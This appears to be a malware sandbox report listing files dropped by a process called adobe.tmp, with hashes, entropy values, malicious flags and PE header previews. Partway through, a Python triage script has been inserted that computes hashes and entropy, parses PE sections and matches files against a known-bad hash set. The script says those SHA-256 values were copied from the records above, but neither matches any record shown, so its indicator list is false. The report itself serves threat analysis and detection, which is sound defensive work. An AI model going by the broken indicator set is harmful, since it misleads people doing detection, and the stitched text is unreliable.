                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):15374
                                                                                                                                                        Entropy (8bit):5.25938266470983
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:l0HhuwYqkoiCBJRgcsZQPCkWa/HI77wbcRODYCpes2n13dwczbUwS7RE8SD:lqhoqkVCXWgI77B0hGnLwczbUwSC8g
                                                                                                                                                        MD5:228EE3AFDCC5F75244C0E25050A346CB
                                                                                                                                                        SHA1:822B7674D1B7B091C1478ADD2F88E0892542516F
                                                                                                                                                        SHA-256:7ACD537F3BE069C7813DA55D6BC27C3A933DF2CF07D29B4120A8DF0C26D26561
                                                                                                                                                        SHA-512:7DFA06B9775A176A9893E362B08DA7F2255037DC99FB6BE53020ECD4841C7E873C03BAC11D14914EFDFE84EFEB3FB99745566BB39784962365BEEBDB89A4531B
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........<.........#.........8...............0....Xj.......................................... ......................p......................................................................P@......................................................text...$...........................`.P`.data...,....0......................@.0..rdata.......@....... ..............@.0@/4...........P......."..............@.0@.bss.........`........................`..edata.......p......................@.0@.idata...............0..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):25614
                                                                                                                                                        Entropy (8bit):6.0293046975090325
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:MiksLrrN6mRXYYYYYYYYYYYYYYYYYYYYYYYYYI9W0oM:zrHFYYYYYYYYYYYYYYYYYYYYYYYYY70N
                                                                                                                                                        MD5:B82364A204396C352F8CC9B2F8ABEF73
                                                                                                                                                        SHA1:20AD466787D65C987A9EBDBD4A2E8845E4D37B68
                                                                                                                                                        SHA-256:2A64047F9B9B07F6CB22BFE4F9D4A7DB06994B6107B5EA2A7E38FAFA9E282667
                                                                                                                                                        SHA-512:C8CAFA4C315CE96D41AD521E72180DF99931B5F448C8647161E7F9DCA29AA07213B9CCEF9E3F7FB5353C7B459E3DA620E560153BDBA1AB529C206330DBD26FF5
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........d.........#....."...`...............@.... g.................................a........ .........................@.......@...............................`............................c.......................................................text.... ......."..................`.P`.data........@.......&..............@.`..rdata.......`.......@..............@.0@/4...........p.......F..............@.0@.bss..................................`..edata..@............T..............@.0@.idata..@............V..............@.0..CRT....,............\..............@.0..tls.................^..............@.0..reloc..`............`..............@.0B................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):43520
                                                                                                                                                        Entropy (8bit):6.232860260916194
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:768:XozEJVjDF38DrOPwLg0cAY7K+k+Y+TyHMjMbHVJx9jm3LkkteFfXbBekdAnPKx:Xo4JJDirOoLg0C7F/rDGdpB52PK
                                                                                                                                                        MD5:B162992412E08888456AE13BA8BD3D90
                                                                                                                                                        SHA1:095FA02EB14FD4BD6EA06F112FDAFE97522F9888
                                                                                                                                                        SHA-256:2581A6BCA6F4B307658B24A7584A6B300C91E32F2FE06EB1DCA00ADCE60FA723
                                                                                                                                                        SHA-512:078594DE66F7E065DCB48DA7C13A6A15F8516800D5CEE14BA267F43DC73BC38779A4A4ED9444AFDFA581523392CBE06B0241AA8EC0148E6BCEA8E23B78486824
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....z.......D................,n.........................p.......`........ ...................... .......0...............................`..............................t........................0...............................text....x.......z..................`.P`.data...,............~..............@.0..rdata..............................@.P@.eh_fram|...........................@.0@.bss.....B............................`..edata....... ......................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):240654
                                                                                                                                                        Entropy (8bit):6.518503846592995
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:yZDfF4DjzIHBV+bUeenu+t+oSTdjpNZ7utS81qpHW4paP2L:ekjzMBVKXeuq+oSTdjpr7N8f+L
                                                                                                                                                        MD5:4F0C85351AEC4B00300451424DB4B5A4
                                                                                                                                                        SHA1:BB66D807EDE0D7D86438207EB850F50126924C9D
                                                                                                                                                        SHA-256:CC0B53969670C7275A855557EA16182C932160BC0F8543EFFC570F760AE2185E
                                                                                                                                                        SHA-512:80C84403ED47380FF75EBA50A23E565F7E5C68C7BE8C208A5A48B7FB0798FF51F3D33780C902A6F8AB0E6DB328860C071C77B93AC88CADF84FEF7DF34DE3E2DA
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.....H...................`.....g.................................\........ .........................o.......\...............................t............................S.......................................................text...dF.......H..................`.P`.data...X....`.......L..............@.P..rdata.......p.......N..............@.`@/4.......<.......>...T..............@.0@.bss..................................`..edata..o...........................@.0@.idata..\...........................@.0..CRT....,...........................@.0..tls................................@.0..reloc..t...........................@.0B................................................................................................................................................................................................................................
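The records above list, for each dropped file, its MD5/SHA1/SHA-256/SHA-512, 8-bit entropy, an Encrypted flag, and a preview of the PE header whose section table carries names such as `.text`, `/4`, `.bss` and `.CRT`. The following Python is an added example, not part of the Joe Sandbox report or its tooling: it reproduces those triage fields for an arbitrary file, walks the PE section table to surface nameless sections and MinGW-style long-name references (`/N`), and matches the SHA-256 against two values copied from the listing above. The packed-entropy threshold of 7.0 and the minimal synthetic PE used as input are assumptions made for illustration.

```python
"""Triage helpers for dropped-file records: hashes, 8-bit entropy,
PE section names and an IOC match against hashes listed on this page.
Added example; not part of the Joe Sandbox report or its tooling."""
import hashlib
import math
import struct
from collections import Counter

# SHA-256 values copied from the dropped-file records above (lowercased);
# extend with the rest of the listing when using this for real.
KNOWN_BAD_SHA256 = {
    "de1a9dd251e29718176f675455592bc1904086b9235a89e6263a3085dddcbb63",
    "b9d5317e10e49aa9ad8ad738eebe9acd360cc5b20e2617e5c0c43740b95fc0f2",
}

# Assumed threshold: PE files whose 8-bit entropy reaches this value are
# usually packed or encrypted; this is an approximation of what an
# entropy-based "Encrypted" flag would key on, not the report's own rule.
PACKED_ENTROPY_THRESHOLD = 7.0


def file_hashes(data: bytes) -> dict:
    """MD5/SHA1/SHA-256/SHA-512 in the same forms the report lists."""
    return {name: hashlib.new(name, data).hexdigest()
            for name in ("md5", "sha1", "sha256", "sha512")}


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 .. 8.0)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def pe_section_names(data: bytes) -> list:
    """Walk the MZ/PE headers and return the raw section names.
    Empty strings are nameless sections; '/N' names are GCC/MinGW
    long-name references into the COFF string table."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    (n_sections,) = struct.unpack_from("<H", data, e_lfanew + 6)
    (opt_size,) = struct.unpack_from("<H", data, e_lfanew + 20)
    table = e_lfanew + 24 + opt_size      # section table follows the optional header
    names = []
    for i in range(n_sections):
        raw = data[table + i * 40: table + i * 40 + 8]
        names.append(raw.rstrip(b"\0").decode("ascii", "replace"))
    return names


def triage(data: bytes) -> dict:
    """One record's worth of triage: hashes, entropy, sections, IOC hit."""
    hashes = file_hashes(data)
    entropy = shannon_entropy(data)
    try:
        sections = pe_section_names(data)
    except ValueError:
        sections = []                      # not a PE: no section table to report
    return {
        **hashes,
        "entropy": entropy,
        "likely_packed": entropy >= PACKED_ENTROPY_THRESHOLD,
        "sections": sections,
        "nameless_sections": sum(1 for s in sections if s == ""),
        "ioc_hit": hashes["sha256"] in KNOWN_BAD_SHA256,
    }


def build_synthetic_pe(section_names) -> bytes:
    """Constructed sample input: a minimal 32-bit PE image (no optional
    header, no section data) so the parser can be exercised offline."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)  # e_lfanew -> PE header at 0x40
    coff = b"PE\0\0" + struct.pack(
        "<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, 0, 0x0102)
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode("ascii").ljust(8, b"\0"),
                    0x1000, 0x1000 * (i + 1), 0x200, 0x400 + 0x200 * i,
                    0, 0, 0, 0, 0x60000020)
        for i, name in enumerate(section_names))
    return bytes(dos) + coff + table


if __name__ == "__main__":
    sample = build_synthetic_pe([".text", "/4", ""])   # one nameless section
    for key, value in triage(sample).items():
        print(f"{key}: {value}")
```

To use this against a real drop, read the file bytes and pass them to `triage()`; the hash fields can be compared directly with the MD5/SHA1/SHA-256/SHA-512 lines of the corresponding record, and a non-zero `nameless_sections` count or a `/N` name is a prompt to look at the section table by hand rather than a verdict on its own.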
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):112640
                                                                                                                                                        Entropy (8bit):6.540227486061059
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:1536:45vq1zsdXYjZmGz9anu3MwjLA/eeiUKJP3Djl23HTKJ7WMU3lPyK+ZSrKxV/UJ9G:vzMMg/gMKeGsMIl6K+Zvry5zNY
                                                                                                                                                        MD5:BDB65DCE335AC29ECCBC2CA7A7AD36B7
                                                                                                                                                        SHA1:CE7678DCF7AF0DBF9649B660DB63DB87325E6F69
                                                                                                                                                        SHA-256:7EC9EE07BFD67150D1BC26158000436B63CA8DBB2623095C049E06091FA374C3
                                                                                                                                                        SHA-512:8AABCA6BE47A365ACD28DF8224F9B9B5E1654F67E825719286697FB9E1B75478DDDF31671E3921F06632EED5BB3DDA91D81E48D4550C2DCD8E2404D566F1BC29
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...N......0u............@.....................................................................2.......v...............................h...................................................................................CODE....Pe.......f.................. ..`DATA....D............j..............@...BSS......................................idata..v...........................@....edata..2...........................@..P.reloc..h...........................@..P.rsrc...............................@..P....................................@..P................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):772608
                                                                                                                                                        Entropy (8bit):6.546391052615969
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:Q75mFL0MNnM/SQdtij4UujFhGiNV1SckT3wio2L2jV6EfnQ29mwF3s4iGtInw1m8:AwN0e0lN1fnQUFccGns9ukS6
                                                                                                                                                        MD5:B3B487FC3832B607A853211E8AC42CAD
                                                                                                                                                        SHA1:06E32C28103D33DAD53BE06C894203F8808D38C1
                                                                                                                                                        SHA-256:30BC10BD6E5B2DB1ACE93C2004E24C128D20C242063D4F0889FD3FB3E284A9E4
                                                                                                                                                        SHA-512:FA6BDBA4F2A0CF4CCA40A333B69FD041D9EDC0736EDA206F17F10AF5505CC4688B0401A3CAD2D2F69392E752B8877DB593C7872BCDB133DC785A200FF38598BB
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....1.d.................D..........$].......`....@.......................................@......@...................0..o............p...(...................`...............................P......................X........ .......................text...h4.......6.................. ..`.itext.......P.......:.............. ..`.data....7...`...8...H..............@....bss....0i...............................idata..............................@....didata...... ......................@....edata..o....0......................@..@.tls.........@...........................rdata..]....P......................@..@.reloc.......`......................@..B.rsrc....(...p...(..................@..@....................................@..@................
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):294926
                                                                                                                                                        Entropy (8bit):6.191604766067493
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:3072:7E0FFjiAeF21pLQFgK33duKMnlCj3eWyNg2hlNvFXl8rzJjjOjVmdX566Uwqwqwm:wKFX3LygKjjN2HIfpruwqwqwFUgVE
                                                                                                                                                        MD5:C76C9AE552E4CE69E3EB9EC380BC0A42
                                                                                                                                                        SHA1:EFFEC2973C3D678441AF76CFAA55E781271BD1FB
                                                                                                                                                        SHA-256:574595B5FD6223E4A004FA85CBB3588C18CC6B83BF3140D8F94C83D11DBCA7BD
                                                                                                                                                        SHA-512:7FB385227E802A0C77749978831245235CD1343B95D97E610D20FB0454241C465387BCCB937A2EE8A2E0B461DD3D2834F7F542E7739D8E428E146F378A24EE97
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#.........|.....................n.................................c........ ......................`..j7...........................................................................................................................text...8...........................`.P`.data...x...........................@.0..rdata...F.......H..................@.`@/4.......U.......V..................@.0@.bss.........P........................`..edata..j7...`...8...$..............@.0@.idata...............\..............@.0..CRT....,............b..............@.0..tls.................d..............@.0..reloc...............f..............@.0B................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):13838
                                                                                                                                                        Entropy (8bit):5.173769974589746
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:192:oh3ZZBe9xz7rdz9Us5bsRuKUYDpesWAhQqCNhNXUwS7RuLH9+E:ohLBe3dz9UsikKDGZqCNhNXUwS4bcE
                                                                                                                                                        MD5:9C55B3E5ED1365E82AE9D5DA3EAEC9F2
                                                                                                                                                        SHA1:BB3D30805A84C6F0803BE549C070F21C735E10A9
                                                                                                                                                        SHA-256:D2E374DF7122C0676B4618AED537DFC8A7B5714B75D362BFBE85B38F47E3D4A4
                                                                                                                                                        SHA-512:EEFE8793309FDC801B1649661B0C17C38406A9DAA1E12959CD20344975747D470D6D9C8BE51A46279A42FE1843C254C432938981D108F4899B93CDD744B5D968
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........6.........#.........2...............0....@m.................................Z........ ......................p..J.......h............................................................@......................................................text...............................`.P`.data...,....0......................@.0..rdata.......@......................@.0@/4...........P......................@.0@.bss.........`........................`..edata..J....p.......(..............@.0@.idata..h............*..............@.0..CRT....,............0..............@.0..tls.................2..............@.0..reloc...............4..............@.0B................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):258560
                                                                                                                                                        Entropy (8bit):6.491223412910377
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:X+FRYMGwNozw5upAagZnb80OXrGSc+w9nI7ZMcyVhk233M:SGMGbw5upAagZb80SMXzkgM
                                                                                                                                                        MD5:DB191B89F4D015B1B9AEE99AC78A7E65
                                                                                                                                                        SHA1:8DAC370768E7480481300DD5EBF8BA9CE36E11E3
                                                                                                                                                        SHA-256:38A75F86DB58EB8D2A7C0213861860A64833C78F59EFF19141FFD6C3B6E28835
                                                                                                                                                        SHA-512:A27E26962B43BA84A5A82238556D06672DCF17931F866D24E6E8DCE88F7B30E80BA38B071943B407A7F150A57CF1DA13D2137C235B902405BEDBE229B6D03784
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.j..f...f...f..]....f..]...f..]....f......f......f......f......f..]....f...f..]f......f......f......f...f...f......f..Rich.f..........PE..L...y.._...........!................@........ ...............................@..........................................d...$...(.......h.................... ......................................(...@............ ..8............................text...q........................... ..`asmcode.>$.......&.................. ..`.rdata..B.... ......................@..@.data...............................@....rsrc...h...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):715038
                                                                                                                                                        Entropy (8bit):6.506117629405352
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:12288:RRObekMtkfohrPUs37uzHnA6zgpKq35eERXprNrHIR3/j1vGgZpDExyc/:LObekYkfohrP337uzHnA6cgqpeEFHS9M
                                                                                                                                                        MD5:B3409D6A8032BDC34CC66F558D065980
                                                                                                                                                        SHA1:D9FADAD0B88C38243D51D5D600C021F7EB787365
                                                                                                                                                        SHA-256:2B7E19859B5E49083A988005C98C6E315B0B3D34C45AEACCB6C8E5DE68D4D94E
                                                                                                                                                        SHA-512:BDB716FFDB409CF64C121F4C8EBF1AF01DB004992187BA1CD667D237FC015657B1A4C6F668A3F86EA6DC138004D382A73BB8242AD53DA838FFB332E7843EC125
                                                                                                                                                        Malicious:true
                                                                                                                                                        Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f..........pr............@..............................................@...............................%..................................................................................................................CODE.....d.......f.................. ..`DATA.................j..............@...BSS..................|...................idata...%.......&...|..............@....tls.....................................rdata..............................@..P.reloc.............................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1757184
                                                                                                                                                        Entropy (8bit):7.100391080204771
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24576:JAQ4shKtykNo8EEOSl9//ryooMLqSB1gmxAMGkTMWad6JNcED/RZVqL3zpUy0NuQ:JAshu19d/mwLqAgjga7n
                                                                                                                                                        MD5:553F6C0E3426D5D3D0332C31637B5232
                                                                                                                                                        SHA1:6D3BE1372F5E1427D67E9504E5A7E5759CD5F9BC
                                                                                                                                                        SHA-256:D0BCF991900B065DB2E8E0290548825BFB46C72D4198EBAFC06427AEE136237F
                                                                                                                                                        SHA-512:1BE7A24AC3D8B62FA1CA0E64A5ACAE1B97F7BFF53FD9A0CF6A3864BC89C1571F9CD60C85970C94A054086766A7D738EAE1C3B3AEA44AD198E6806D10531C913A
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e..................................... ....@.................................b........................................%...........#........................................................................... ...............................text............................... ..`.rdata...#... ...0... ..............@..@.data.... ...P.......P..............@....rsrc....#.......0...`..............@..@_vset_8..@.......@..................`...........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:IFF data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1716
                                                                                                                                                        Entropy (8bit):4.781797138644031
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24:wSXqInX3C5DMDxJWyjPTw2C4F0lB6v4AnFt+cUeC1/B0vFFNgpX27:wSacX3ChMDxPpulB6gAFHSJE6X27
                                                                                                                                                        MD5:257D1BF38FA7859FFC3717EF36577C04
                                                                                                                                                        SHA1:A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
                                                                                                                                                        SHA-256:DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
                                                                                                                                                        SHA-512:E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith
                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
                                                                                                                                                        File Type:IFF data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):1716
                                                                                                                                                        Entropy (8bit):4.781797138644031
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:24:wSXqInX3C5DMDxJWyjPTw2C4F0lB6v4AnFt+cUeC1/B0vFFNgpX27:wSacX3ChMDxPpulB6gAFHSJE6X27
MD5:257D1BF38FA7859FFC3717EF36577C04
SHA1:A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
SHA-256:DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
SHA-512:E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
Malicious:false
Preview:FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith

Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):1825
Entropy (8bit):5.088030483893024
Encrypted:false
SSDEEP:24:ZhIPjdbiNJQ387Udf9NpHjjY2S7AJYazRMiZMjYzMX2OP5usmC2ZxJnIBVjYHwZ2:vg79lS7sbtujNfuvlXJEVjH4O2
MD5:992C00BEAB194CE392117BB419F53051
SHA1:8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
SHA-256:9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
SHA-512:FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
Malicious:false
Preview:.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<

Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
File Type:IFF data
Category:dropped
Size (bytes):1716
Entropy (8bit):4.781797138644031
Encrypted:false
SSDEEP:24:wSXqInX3C5DMDxJWyjPTw2C4F0lB6v4AnFt+cUeC1/B0vFFNgpX27:wSacX3ChMDxPpulB6gAFHSJE6X27
MD5:257D1BF38FA7859FFC3717EF36577C04
SHA1:A9D2606CFC35E17108D7C079A355A4DB54C7C2EE
SHA-256:DFACC2F208EBF6D6180EE6E882117C31BB58E8B6A76A26FB07AC4F40E245A0CB
SHA-512:E13A6F489C9C5BA840502F73ACD152D366E0CCDD9D3D8E74B65FF89FDC70CD46F52E42EEE0B4BA9F151323EC07C4168CF82446334564ADAA8666624F7B8035F3
Malicious:false
Preview:FORMAT controls the output. Interpreted sequences are:.. %% a literal %. %a locale's abbreviated weekday name (e.g., Sun). %A locale's full weekday name (e.g., Sunday). %b locale's abbreviated month name (e.g., Jan). %B locale's full month name (e.g., January). %c locale's date and time (e.g., Thu Mar 3 23:05:25 2005). %C century; like %Y, except omit last two digits (e.g., 20). %d day of month (e.g., 01). %D date; same as %m/%d/%y. %e day of month, space padded; same as %_d. %F full date; same as %Y-%m-%d. %g last two digits of year of ISO week number (see %G). %G year of ISO week number (see %V); normally useful only with %V. %h same as %b. %H hour (00..23). %I hour (01..12). %j day of year (001..366). %k hour, space padded ( 0..23); same as %_H. %l hour, space padded ( 1..12); same as %_I. %m month (01..12). %M minute (00..59). %n a newline. %N nanoseconds (000000000..999999999). %p locale's equivalent of eith

Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):1825
Entropy (8bit):5.088030483893024
Encrypted:false
SSDEEP:24:ZhIPjdbiNJQ387Udf9NpHjjY2S7AJYazRMiZMjYzMX2OP5usmC2ZxJnIBVjYHwZ2:vg79lS7sbtujNfuvlXJEVjH4O2
MD5:992C00BEAB194CE392117BB419F53051
SHA1:8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
SHA-256:9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
SHA-512:FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
Malicious:false
Preview:.# Tag replace definition..# ..# Values must be put into sections...# The following section names are supported:..#..# [*] is for all tags, i.e. values specified under this section will be replace in all tags..# Following tag-specific identifiers can be used. Values will be replaced only in specified tag...# [Conductor]..# [Date]..# [Publisher]..# [Lyrics]..# [Flags]..# [ISRC]..# [Title]..# [Catalog]..# [Year]..# [Genre]..# [Artist]..# [Album]..# [DiscId]..# [BPM]..# [Album Artist]..# [Composer]..# [Content Group]..# [Compilation]..# [Disc]..# [Track]..# [Comments]..# [Encoded by]..#..# Format is <value from>=<value to>..# where <value from> is case-sensitive value, which will be replaced..# with <value to>, which is RegEx expression...#..# If you want to do a case insensitive replacement, add ! to the name of the section ..#..# Those are specific value, which can be used as <value from>:..#..# <NULL> is used to specify empty tag as well as empty value, e.g. ..# [Comments]..# <ANY>=<

Process:C:\Users\user\AppData\Local\Temp\is-D33JM.tmp\adobe.tmp
File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):1825
Entropy (8bit):5.088030483893024
Encrypted:false
SSDEEP:24:ZhIPjdbiNJQ387Udf9NpHjjY2S7AJYazRMiZMjYzMX2OP5usmC2ZxJnIBVjYHwZ2:vg79lS7sbtujNfuvlXJEVjH4O2
MD5:992C00BEAB194CE392117BB419F53051
SHA1:8F9114C95E2A2C9F9C65B9243D941DCB5CEA40DE
SHA-256:9E35C8E29CA055CE344E4C206E7B8FF1736158D0B47BF7B3DBC362F7EC7E722C
SHA-512:FACDCA78AE7D874300EACBE3014A9E39868C93493B9CD44AAE1AB39AFA4D2E0868E167BCA34F8C445AA7CCC9DDB27E1B607D739AF94AA4840789A3F01E7BED9D
Malicious:false
